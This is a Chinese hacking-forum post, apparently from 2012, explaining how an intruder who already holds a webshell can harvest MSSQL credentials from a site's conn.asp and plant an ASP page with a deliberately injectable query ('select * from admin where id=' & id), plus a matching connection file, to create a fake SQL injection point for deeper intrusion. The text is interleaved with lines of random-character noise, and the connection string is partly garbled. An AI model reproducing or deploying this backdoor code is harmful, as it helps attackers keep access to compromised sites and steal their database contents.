中国网络渗透测试联盟
标题:
自己构造注入点方便入侵
[打印本页]
作者:
admin
时间:
2012-9-13 17:27
标题:
自己构造注入点方便入侵
自己构造注入点方便入侵
2 {. x% B9 K8 g5 `/ d
# A# h+ E. }6 _8 j$ ?$ C0 e
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
( a. i5 V- a+ n* |5 q% N* R
( H& d2 R1 R3 _$ r
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
( z9 ?; o5 g5 [' v* h' d
1 z3 T8 V" a. G4 ^: x$ }! S& S" k
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
! u% K# H% d& ?! U+ G" e
% E7 ~! }8 a* u3 k3 H I, k9 Q
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
& x% [; @" d K r5 A/ L
7 A5 O: j) m% O1 T' k
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
% j* ]2 g& e% N/ `2 z5 V+ E* W
2 c0 u T- e2 ?
程序代码
N0 F* n1 k; O; i, y; G, F# n
<!--#include file="xx.asp"-->
, D1 H5 h1 t4 n
<%
) ` t7 D4 B$ @; k9 z
set rs=server.createobject("ADODB.recordset")
. Y0 a/ J; f. x
id = request("id")
1 J4 ~! j4 u- A, V5 X% y2 d
strSQL = "select * from admin where id=" & id
) ^& _# l/ D8 _, y2 _1 f0 A
rs.open strSQL,conn,1,3
2 ]& a- h7 @* r, H: j
rs.close
7 K% }/ U3 K' O: \
%>
4 V- W/ v9 C; x4 I
* H2 v* d0 ] K8 V
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
, [- O+ S, v( g% z% V
3 j' h: y o8 h X6 G
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
5 Y! \; A4 ?3 e
( G) g$ G/ `" ~( h4 l$ Z
然后就要构造一个连接数据库的文件了,代码如下:
& u% ~& x: M* N" k/ p
程序代码
. g2 f, o+ B7 _ |2 u
<%
6 K1 R4 d( ?% Q& R
strSQLServerName = "000.000.000.000" '服务器名称或地址
5 P. ]/ U4 P( c, t) D8 |
strSQLDBUserName = "sqlname" '数据库帐号
- t. B- Y; a+ |7 l6 V$ D& l9 |
strSQLDBPassword = "sqlpass" '数据库密码
+ L9 j. c3 ]; k/ p
strSQLDBName = "sqldataname" '数据库名称
8 b) N& Z: i# `
Set conn = Server.CreateObject("ADODB.Connection")
5 r1 I, {+ S6 ?+ l8 {) R0 ^" B
strCon = "
rovider=SQLOLEDB.1
ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "
assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
! R% A3 S5 J1 f- s9 V/ X
conn.open strCon
# C! o) f& A0 `& _4 k# U, d" n' z6 [
%>
) I$ o" L4 g7 D3 b0 b9 S" K0 O
2 {# t5 M1 T/ \" c x
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
/ M y+ K% h/ [6 W
, A5 M9 w- `) A4 q; T
就这样,正常情况下,就OK了,伪造成功……
) T( N5 k4 T1 _& a% k
: H6 X! r, Q/ }- i/ p7 n1 x
如果有什么问题可以提出来大家一起探讨解决。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2